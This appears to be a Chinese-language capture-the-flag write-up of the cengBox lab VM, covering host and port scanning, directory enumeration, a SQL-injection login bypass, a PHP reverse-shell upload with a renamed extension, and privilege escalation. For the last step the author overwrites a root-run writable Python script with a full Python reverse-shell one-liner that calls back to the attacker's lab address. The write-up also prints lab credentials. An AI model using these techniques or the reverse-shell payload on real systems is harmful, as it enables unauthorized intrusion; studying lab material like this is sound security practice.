cengBox靶机wp

主机探活

nmap -sn 192.168.159.0/24

在这里插入图片描述
发现目标主机:192.168.159.153


端口扫描

nmap -sV -p- -A 192.168.159.153

在这里插入图片描述

可以看到只开放了22、80端口

尝试连接22,结果人家是密钥认证,直接凉凉,只能从80端口找突破口

在这里插入图片描述


80端口

目录扫描
dirsearch -u 192.168.159.153

在这里插入图片描述

这里基本没扫出来东西,但是这里提示我们 masteradmin 目录下还有东西,那我们扫描这个路径


dirsearch -u 192.168.159.153/masteradmin

在这里插入图片描述

db.php 数据库配置文件

login.php 登陆页面

upload.php 上传页面都可以正常访问,看一看


login.php

尝试了 db.php,没有内容;upload.php,自动跳转login.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dIoTLnz9-1659705665129)(cengBox/image-20220726221817909-16588450994301.png)]

登陆页面,尝试 sql 注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dQ0JwSIx-1659705665130)(cengBox/image-20220726221958800.png)]

直接进去了。。。这靶场打点的难度较低。。。

在这里插入图片描述

文件上传

上传一个php 反弹shell脚本

点击上传没反应,抓个包(返回包)看看。。。
在这里插入图片描述

要该文件后缀名。。。

改一下试试

在这里插入图片描述

成功!!

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Y4fQc1S-1659705665133)(cengBox/image-20220726223006599.png)]


去之前扫到过的 uploads 文件夹下看看能否触发


应该触发了,警告等于没有(滑稽


反弹shell

nc -npvl 7777

在这里插入图片描述

成功


提权

setuid
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

都很常规,好像没啥可以利用的。。。


计划任务
corntab -l

在这里插入图片描述

cat /etc/corntab

在这里插入图片描述

还是没啥可用的


家目录看看

4

看了一波,没有啥可用的信息。。。


网站目录

在这里插入图片描述

好东西啊,哈哈哈哈

得到了账户:cengbox 这里属实我脑瘫,这 tm 是数据库的名字。

​ 密码:SuperS3cR3TPassw0rd1!

思考它有没有可能是之前看到的家目录下的 cengover的用户名密码?试一下!!


换用户喽~~(这nt了,错的)

45

先换个命令行

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

在这里插入图片描述

不行。。。只能进数据库看看了。。。


数据库

1

用户是 root !!!


在这里插入图片描述

得到一份用户名和密码:

用户名:masteradmin

密码: C3ng0v3R00T1!

感觉没加密,试一试去


换用户

在这里插入图片描述

成功切换。。

然后来了一套 setuid,sudo,crontab,都没有可利用的,直接看cengover用户家目录


cengover用户目录

在这里插入图片描述

找到一串密码,猜测为 root 密码,感觉像 MD5 加密,检测一下

8f7f6471e2e869f029a75c5de601d5e0


hashid 8f7f6471e2e869f029a75c5de601d5e0

在这里插入图片描述

大概率 MD5 了

就一个MD5 要解出来太离谱了。。。后面上网查才知道这是cengover的flag。。。还是靶机打少了啊。。。


上传脚本检测
python -m SimpleHTTPServer 80	# 本地开一个简单http服务

查看操作系统版本,是64位的

umane -a

12

上传64位的检测脚本 pspy64

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-h5AKKSjz-1659705665145)(cengBox/image-20220727104736640.png)]
这个脚本去网上一搜,都有,这里就不提供了


执行该脚本

这个脚本的作用是实时检测系统中运行的进程

chmod +x pspy64
./pspy64

在这里插入图片描述

发现一条可以信息,root权限运行md5check,去看看是什么

/opt/md5check.py


md5check

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-A74YLeN1-1659705665148)(cengBox/image-20220727105313018.png)]

发现 user 组用户可读可写,而我们cengover用户刚好属于user组

在这里插入图片描述

把这个文件改掉,改为 python 退回 shell 即可

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.131",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

在这里插入图片描述


启动监听,等待 md5check 自动运行

77
成功!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值